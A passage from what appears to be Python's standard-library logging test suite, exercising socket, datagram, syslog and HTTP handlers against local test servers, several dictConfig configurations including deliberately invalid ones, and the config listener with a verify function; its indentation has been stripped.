time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
